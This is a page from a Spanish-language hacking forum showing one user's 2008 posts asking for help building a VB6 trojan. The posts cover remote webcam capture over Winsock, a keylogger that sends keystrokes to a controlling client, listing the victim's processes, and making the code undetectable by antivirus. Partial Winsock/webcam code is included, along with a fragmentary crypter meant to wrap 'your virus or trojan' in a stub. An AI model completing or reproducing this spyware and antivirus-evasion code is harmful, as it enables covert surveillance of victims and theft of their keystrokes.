elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8
31  Programación / Programación Visual Basic / winsock vb6 duda en: 2 Diciembre 2008, 13:07 pm
hola buenas ya tengo hecha la conexion de mi troyano y al agregar que capture la cam del servidor no recibo las imagenes...deberia agregarle otro winsock para la cam?
32  Programación / Programación Visual Basic / Re: keylogger visual basic en: 1 Diciembre 2008, 13:37 pm
buenos dias mirar pongo mi keylogger me va de maravilla pero cuando pongo este codigo para capturar la imagen de la cam me entonces las teclas pulsadas si escribo un poco deprisa no las veo esto lo he puesto en el form_load:

Command1.Caption = "Conectar"
Text1.Text = "127.0.0.1"
If Command1.Caption = "Conectar" Then
Winsock1.CONNECT Text1, CInt(Text2)
mCapHwnd = capCreateCaptureWindow("WebcamCapture", 0, 0, 0, 320, 240, Me.hwnd, 0)
DoEvents: SendMessage mCapHwnd, CONNECT, 0, 0
Timer2.Enabled = True
Command1.Caption = "Desconectar"
Else
Timer2.Enabled = False
DoEvents: SendMessage mCapHwnd, DISCONNECT, 0, 0
Winsock1.Close
Me.Caption = "Desconectado"
Command1.Caption = "Conectar"
End If

se que es por estas dos lineas:
DoEvents: SendMessage mCapHwnd, CONNECT, 0, 0
DoEvents: SendMessage mCapHwnd, DISCONNECT, 0, 0
como lo arreglaria
33  Programación / Programación Visual Basic / Re: keylogger visual basic en: 30 Noviembre 2008, 00:16 am
pues seba123neo seria lo mejor no  ;D asin no pienso yo tanto no..  :rolleyes:
es broma no te enfades hombre..
lo que queria preguntar era con que funcion seria para ver los procesos,no preguntaba como se hace ni como hay que poner el code ni donde.

    saludos... ::)
34  Programación / Programación Visual Basic / Re: keylogger visual basic en: 29 Noviembre 2008, 19:35 pm
quiero que mi cliente me muestre los procesos del administrador de tareas  de el servidor..como?

35  Programación / Programación Visual Basic / Re: keylogger visual basic en: 28 Noviembre 2008, 22:57 pm
buenas noches gracias a todos por contestar  ;D

saludos. ::)
36  Programación / Programación Visual Basic / Re: keylogger visual basic en: 26 Noviembre 2008, 20:13 pm
es que resulta que en el timer tengo el codigo para que me mande las teclas pulsadas a mi cliente..pero ya solucione..lo que me pasa ahora es que me infecto con el server me funciona biien pero cuando me llega las pulsaciones me sale todo en mayuscula y nada en minuscula..sabes como lo solucionaria?
37  Programación / Programación Visual Basic / Re: keylogger visual basic en: 26 Noviembre 2008, 10:33 am
el codigo no es mio pero lo estoy modificando en la mayor parte hasta lo detectaban 3 antivirus ahora ninguno el fallo creo que esta en el timmer..eso parece.. ;D
bueno ya esta solucionado  ;D


pero ahora jaaj me sale todo en mayusculas y no se por que?
38  Programación / Programación Visual Basic / keylogger visual basic en: 25 Noviembre 2008, 23:19 pm
buenas estoy haciendo un keylogger en vb6 y tengo un problemilla  ;D...
me captura todas las teclas bien pero cuando pulso una tecla ejemplo la h pues me sale mayuscula y minuscula  :rolleyes: asin todas las teclas como podria solucionarlo?
39  Programación / Programación Visual Basic / Re: funcionaria este crypter con su stub? en: 14 Noviembre 2008, 14:36 pm
si esque amigo ya estoy harto de modificar offsets  :rolleyes: yo quiero crear mis herramientas bueno el libro de aprender visual basic como si estuvieras en primero me aconsejas ese u otro?
40  Programación / Programación Visual Basic / funcionaria este crypter con su stub? en: 14 Noviembre 2008, 12:50 pm
hola amigos buenos dias lo primero de todo por favor no reirse de mi  :¬¬
estoy haciendo un crypter eso creo  ;D
soy demasiado novato en esto de programar  ;D
quisiera saber si este codigo me funcionaria haciendole su stub por supuesto ya que no me da ningun error... ::)

Dim ruta As String

Private Sub encryptar_Click()
On Error GoTo error_sub
Dim datos() As Byte
Dim elen As Long
Open "" For Binary Lock Read As 1
If Text1.Text = "" Then
End
End If
dialog.FileName = ""
dialog.Filter = "*.exe|*.exe"
ruta = dialog.FileName
FileCopy App.Path & "\Stub.exe", ruta
Open "" For Binary Access Write As 2
elen = FileLen("")
ReDim datos(elen) As Byte
Get #1, , datos
Put #2, , datos
dialog.ShowSave
Close
MsgBox "archivo cifrado", vbInformation
Exit Sub
error_sub:
MsgBox Err.Description, vbCritical
End Sub

Private Sub seleccionar_Click()
dialog.DialogTitle = "selecciona tu archivo"
dialog.Filter = "Archivo ejecutable*.exe|*.exe"
dialog.ShowOpen
If dialog.FileName <> "" Then
Text1.Text = dialog.FileName
Label1 = "archivo seleccionado es la hora de encryptar XD"
Else
Label1 = "selecciona tu virus o troyano no te olvides XD"
End If
End Sub

bueno espero que este bien  ;D

saludos
Páginas: 1 2 3 [4] 5 6 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines